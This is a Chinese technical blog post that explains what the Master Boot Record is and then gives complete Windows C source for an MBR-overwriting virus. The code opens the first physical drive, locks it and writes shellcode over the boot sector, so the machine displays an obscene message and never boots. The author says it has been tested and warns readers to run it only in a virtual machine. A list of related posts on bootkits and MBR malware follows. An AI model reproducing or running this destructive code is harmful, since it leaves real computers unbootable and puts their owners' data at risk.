MBR 病毒

最新推荐文章于 2022-07-23 11:02:54 发布
最新推荐文章于 2022-07-23 11:02:54 发布
阅读量1.9k 收藏 8
点赞数 1
分类专栏: 病毒木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Simon798/article/details/114143725
版权

背景

MBR全称主引导记录(Master Boot Record),整个硬盘最开头的512字节就是它。

计算机启动后会先运行MBR里的代码进行各种状态的检查和初始化的工作,然后再把控制权转交给操作系统(简单地讲就是一个JMP指令跳到操作系统的起始代码),Windows就加载启动了。

在这里插入图片描述

MBR 病毒做的事就是直接把整个MBR覆盖掉,变成了它自己的代码,那么它想干什么都行了,只要它不主动交出代码执行流程,Windows绝没有启动的机会。

代码

此代码来自:https://www.cnblogs.com/xiongwei/p/9646017.html

经过测试,在 64 位系统中必须使用 x64 编译才有效果,运行完代码后重启,屏幕上就会出现一行红字: "I am virus! Fuck you :-)"一定要放在虚拟机里跑 ,不然会翻车的。

#include <windows.h>
#include <winioctl.h>

unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
/*
00000000  B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)
00000003  CD10 int 10h ; 进入图形显示方式,隐藏光标
00000005  BD187C mov bp, Msg ; ES:BP = 串地址
00000008  B91800 mov cx, 18h ; CX = 串长度
0000000B  B80113 mov ax, 1301h ; AH = 13,  AL = 01h
0000000E  BB0C00 mov bx, 000ch ; 页号为0(BH = 0) 黑底红字(BL = 0Ch,高亮)
00000011  BA1D0E mov dx, 0e1dh ; dh行, dl列
00000014  CD10 int 10h ; 10h 号中断
00000016  E2FE loop $
Msg: db "I am virus! Fuck you :-)"
*/
int  main()
{
	HANDLE hDevice;
	DWORD dwBytesWritten, dwBytesReturned;
	BYTE pMBR[512] = { 0 };

	// 重新构造MBR
	memcpy(pMBR, scode, sizeof(scode) - 1);
	pMBR[510] = 0x55;
	pMBR[511] = 0xAA;

	hDevice = CreateFile
	(
		L"\\\\.\\PHYSICALDRIVE0",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		0,
		NULL
	);
	if (hDevice == INVALID_HANDLE_VALUE)
		return -1;
	DeviceIoControl
	(
		hDevice,
		FSCTL_LOCK_VOLUME,
		NULL,
		0,
		NULL,
		0,
		&dwBytesReturned,
		NULL
	);
	// 写入病毒内容
	WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
	DeviceIoControl
	(
		hDevice,
		FSCTL_UNLOCK_VOLUME,
		NULL,
		0,
		NULL,
		0,
		&dwBytesReturned,
		NULL
	);
	CloseHandle(hDevice);
	return 0;
}
(-: LYSM :-)
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MBR病毒分析
12-06
MBR病毒分析 一、基础知识 1、 Windows启动过程 系统引导过程主要由以下几个步骤组成(以硬盘启动为例) 1、 开机; 2、 BIOS加电自检(POST---Power On Self Test),内存地址为0fff:0000; 3、 将硬盘第一个扇区(0头0道1扇区,也就是Boot Sector)读入内存地址0000:7c00处; 4、 检查(WORD)0000:7dfe是否等于0xaa55.若不等于则转去尝试其他介质;如果没有其他启动介质,则显示 ”No ROM BASIC” ,然后死机; 5、 跳转到0000:7c00处执行MBR中的程序; 6、 MBR先将自己复制到0000:0600处,然后继续执行; 7、 在主分区表中搜索标志为活动的分区.如果发现没有活动分区或者不止一个活动分区,则停止; 8、 将活动分区的第一个扇区读入内存地址0000:7c00处; 9、 检查(WORD)0000:7dfe是否等于0xaa55,若不等于则显示 “Missing Operating System”,然后停止,或尝试软盘启动; 10、 跳转到0000:7c00处继续执行特定系统的启动程序; 11、 启动系统. 以上步骤中(2),(3),(4),(5)步由BIOS的引导程序完成;(6),(7),(8),(9),(10)步由MBR中的引导程序完成. Windows启动过程主要由以下几个步骤组成,其中vista和win7可一概而论
[zz]古老的MBR感染---MBR/BS Infection
a519609598的博客
08-25 243
1.Introduction============== In my search for knowledge, I found many tutorials out there that werecreated to show the user how to code a simple boot sector virus. Although thetutes were very g...
小小Bootkit(4)
sjtujgxxaq的专栏
06-01 638
BootKit之感染磁盘部分 Sjtujg 这部分代码实际上就是最后的病毒,负责将病毒字节内容写到磁盘上一块隐蔽的区域,每次开机启动的时候就从该磁盘区域中将病毒读入内存中。 这部分代码与VirusMbr和PmVirus相比要简单的多,主要是C代码结合一些windows api。下面结合一些关键部分进行解释。 待写入磁盘的病毒内容已经转换成了unsigned char型数组VirusMbr[
针对MBR的文件型病毒及其防护程序的研究与实现
07-16 163
摘要在计算机病毒和反病毒激烈博弈的今天,病毒技术复杂高深,而且发展迅猛,给反病毒技术带来巨大挑战,同时也威胁到了计算机用户的信息安全。本文详细剖析了在Windows操作系统上较为常见的文件型病毒,使用MASM汇编,开发了可以重定位并具有感染能力的传播模块,攻击模块对MBR进行剖析,实现对MBR的修改和加密;同时也对此类文件型病毒的启动和传播进行研究,发现此...
小小Bootkit(2)
sjtujgxxaq的专栏
06-01 1078
BootKit之VirusMbr Sjtujg 先介绍一些关于MBR的基础知识,Bios加电之后选择引导介质(一般是磁盘),如果选择了磁盘,就将磁盘的第一个扇区的内容读入到内存中,然后流程转向执行这部分代码,磁盘的第一个扇区就是我们所说的MBR.MBR的内容有512个字节,其中可执行的代码内容只有400多字节,还有64个字节是磁盘分区表,计算机凭借分区表来选择引导分区,并将其第一个扇区(引导扇
MBR病毒】实现与解决方案
tiantian520_tt——Python程序猿~
05-02 3488
复现 环境 Attacker OS: Windows 10 1909 X64 IDE: Dev-C++ 5.11 Filename: MBR.cpp Out Filename: MBR.exe Player OS: Windows XP SP2 Filename: MBR.exe 步骤 0.0.1 编译及拷贝 将以下代码输入进Dev-C++: #include<Windows.h> #include<stdio.h> #include<iostream> using na
病毒木马查杀实战第023篇:MBR病毒之引导区的解析
Gleam的专栏
04-18 9579
前言        引导型病毒指寄生在磁盘引导区或主引导区的计算机病毒。这种病毒利用系统引导时,不对主引导区的内容正确与否进行判别的缺点,在引导系统的过程中入侵系统,驻留内存,监视系统运行,伺机传染和破坏。按照引导型病毒在硬盘上的寄生位置又可细分为主引导记录病毒和分区引导记录病毒。我们未来的几次课,会专门从各个角度来分析这种病毒的特点,阐述病毒原理,提出应对方法。而本次课程的内容主要来讨论一下引
C++木马破坏MBR病毒
ZuoJiaWuKong的博客
07-23 8605
一分钟了解如何编写一个C++强力的木马病毒,可不要去干坏事哦!
小心!基于UEFI引导的病毒,重装系统也清除不了
w3cschools的博客
12-04 3538
TrickBot是世界上最臭名昭著且适应性最强的恶意软件,它正在扩展其工具集,以将目光投向固件漏洞,以潜在地部署Bootkit并完全控制受感染的系统。 它利用易于使用的工具来检查设备是否存在众所周知的漏洞,这些漏洞可能使攻击者将恶意代码注入设备的UEFI / BIOS固件中,攻击者持久存储恶意软件的有效机制,从而重装系统也清除不了。 国际知名白帽黑客、东方联盟创始人郭盛华透露:“这标志着TrickBot的发展迈出了重要的一步,因为UEFI级植入物是最深,最强大,最隐蔽的形式。通过增加针对特定UEFI
MBR 病毒分析
Y_KolaFish_Y的博客
04-10 2583
转载自https://bbs.pediy.com/thread-121861.htm Author:Cryin MBR病毒分析 一、基础知识 1、 Windows启动过程 系统引导过程主要由以下几个步骤组成(以硬盘启动为例) 1、 开机; 2、 BIOS加电自检(POST—Power On Self Test),内存地址为0fff:0000; 3、 将硬盘第一个扇区(0头0道1扇区,也就是Boot...
MBR病毒分析1
08-03
1、 开机 3、 将硬盘第一个扇区(0 头 0 道 1 扇区,也就是 Boot Sector)读入内存地址 0000:7c00 处 4、 检查(WORD)000
MBR病毒专杀 仅支持XP系统
08-23
这个小程序,只要针对MBR病毒。用于MBR专杀,仅支持XP系统。
Anti MBR-Rootkit技术研究
01-20
摘要:本文主要对磁盘主引导记录MBR和Windows操作系统的启动过程进行了阐述,对Rootkit和MBR-Rootkit技术特点进行了总结,对MBR-Rootkit结构和实例的行为特点进行了深入研究和剖析,针对WinXP操作系统的MBR-Rootkit...
系统修复mbr工具
08-20
由于病毒感染、突然关机等原因可能会导致MBR(主引导记录)损坏,出现无法进入系统、电脑启动黑屏等现象。如果您遇到这种问题这个软件也许可以帮你
堆喷射(Heap Spray)
LYSM
03-01 985
简而言之: 1.用途 一般用在浏览器,因为 Javascript 可以直接在堆上分配字符串。 2.如何堆喷射 js中大量分段申请0c0c0c0c内存,每段后面跟shellcode 0到0c0c0c0c总共不到200m 碰运气覆盖一个函数指针 这个函数被调用的时候就会跳到0c0c0c0c处执行 0c对应汇编指令or al,0c 然后一直往下执行 到达shellcode… 原理参考: https://blog.csdn.net/lixiangminghate/article/details/53413863
[病毒木马] Windows 映像劫持
LYSM
03-19 951
介绍 映像劫持(Image File Execution Options),简单的解释就是,当你执行某一程序A的时候,运行的却是另外一个程序B。 实现 通过修改注册表实现。 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options ...
[病毒木马] 利用 Windows 任务计划程序
LYSM
03-18 712
背景 Windows 内置了 任务计划程序 功能,在计算机管理中可以看到。 这个东西可以让你的程序在特定的条件下启动,很多病毒木马使用它在做自启动。 手动创建一个计划任务 参考:https://blog.csdn.net/weixin_43279032/article/details/90030747 使用 cmd 创建一个计划任务 参考:https://blog.csdn.net/weixin_30371875/article/details/97575358 ...
应用层主动触发蓝屏
LYSM
02-26 679
闲的,干点无聊的事情 _(:з」∠)_ 使用 NtRaiseHardError #include <iostream> #include <Windows.h> #include <winternl.h> using namespace std; typedef NTSTATUS(NTAPI *pdef_NtRaiseHardError)(NTSTATUS ErrorStatus, ULONG NumberOfParameters, ULONG UnicodeStrin
windows mbr
最新发布
08-19
需要注意的是,MBR是一个关键的硬盘区域,它也容易受到病毒的攻击。恶意软件可以修改MBR,导致计算机无法正常启动。因此,保护MBR的安全性非常重要。<span class="em">1</span><span class="em">2</span><span class...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值